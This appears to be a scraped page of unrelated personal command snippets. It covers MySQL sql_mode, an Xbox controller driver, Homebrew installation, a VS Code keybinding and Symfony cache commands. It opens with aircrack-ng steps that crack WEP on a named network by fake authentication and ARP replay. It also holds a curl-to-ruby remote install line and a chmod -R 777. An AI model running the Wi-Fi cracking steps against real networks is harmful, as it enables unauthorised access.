This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#1st Step | |
airmon-ng stop wlan0 | |
airmon-ng start wlan0 | |
airodump-ng mon0 | |
#2nd Step | |
sudo airodump-ng -c 6 --bssid B4:75:0E:1A:69:8F -w captura mon0 | |
sudo aireplay-ng -1 0 -e Netcommerce -a B4:75:0E:1A:69:8F -h 11:22:33:44:55:66 mon0 | |
sudo aireplay-ng -3 -b B4:75:0E:1A:69:8F -h 11:22:33:44:55:66 mon0 | |
aircrack-ng -z *.cap |
Server SQL Modes - https://dev.mysql.com/doc/refman/5.7/en/sql-mode.html
SET sql_mode = "ONLY_FULL_GROUP_BY,STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION";
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Install: Open a terminal window and run: | |
sudo apt-get install xboxdrv -y | |
#Usage: Open a terminal window and run: | |
sudo rmmod xpad | |
sudo xboxdrv --mouse | |
#https://github.com/xboxdrv/xboxdrv | |
#http://www.omgubuntu.co.uk/2013/07/dealing-with-xbox-controllers-in-ubuntu | |
#Source: http://xubuntugeek.blogspot.mx/2012/07/how-to-use-xbox-360-controller-as-mouse.html |
Autosave: https://www.jetbrains.com/help/phpstorm/saving-and-reverting-changes.html PhpStorm > Preferences > Appearance & Behavior > System Settings > Synchronization
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
$ brew install wget
{
"key": "ctrl+f5",
"command": "workbench.action.reloadWindow",
"when": "editorTextFocus"
}
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
php app/console assets:install --symlink web && php app/console cache:clear --env=prod && php app/console cache:warmup --env=prod && chmod -R 777 ./app/cache && php app/console assetic:dump --env=prod && php app/console cache:warmup --env=prod | |
php app/console assets:install --symlink web; php app/console cache:clear --env=prod; php app/console cache:warmup --env=prod; chmod -R 777 ./app/cache; php app/console assetic:dump --env=prod; php app/console cache:warmup --env=prod |